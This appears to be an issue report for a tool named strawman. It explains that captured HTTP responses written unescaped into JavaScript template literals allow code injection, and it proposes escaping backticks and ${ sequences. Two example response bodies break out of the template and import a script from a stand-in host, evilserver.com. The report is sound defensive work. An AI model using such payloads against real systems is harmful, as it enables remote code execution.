The Problem

Imagine an HTTP Response that looks like this:

200 OK

content-type: text/plain
date: Fri, 18 Mar 2022 12:53:57 GMT

I'm just innocent text. But here's the twist:`;

console.log("Well, that's too bad. This code will immediately be executed as soon as this reponse was captured.");
await import("https://evilserver.com/evilscript.ts");
`

The occurrence of a backtick breaks the captured response and allows for arbitrary code execution inside the template file. The template file is being imported immediately after being captured, so malicious code would be executed before the user has a chance to react.

Another way to achieve arbitrary code execution would be the use of interpolation:

200 OK

content-type: text/plain
date: Fri, 18 Mar 2022 12:53:57 GMT

I'm another innocent text. But look what I can do: ${await import("https://evilserver.com/evilscript.ts")}

Anything inside ${...} would be executed immediately.

The Solution

We need to properly escape the responses when they're being written to the file system.

According to https://262.ecma-international.org/6.0/#sec-template-literal-lexical-components we need to keep an eye on the character sequences ` and ${, if those are preceded by \, they will be treated as ordinary text. (Please consider the specs more deeply to see if more ground needs to be covered here)

That point at which this is needed lies in modules/strawman-core/infrastructure/fs/syncVirtualServiceTreeWithDirectory.ts. The escape mechanism however may live in a separate function.

Acceptance Criteria

• When written to the filesystem every occurrence of ` inside a captured response has been escaped to \`
• When written to the filesystem every occurrence of ${ inside a captured response has been escaped to \${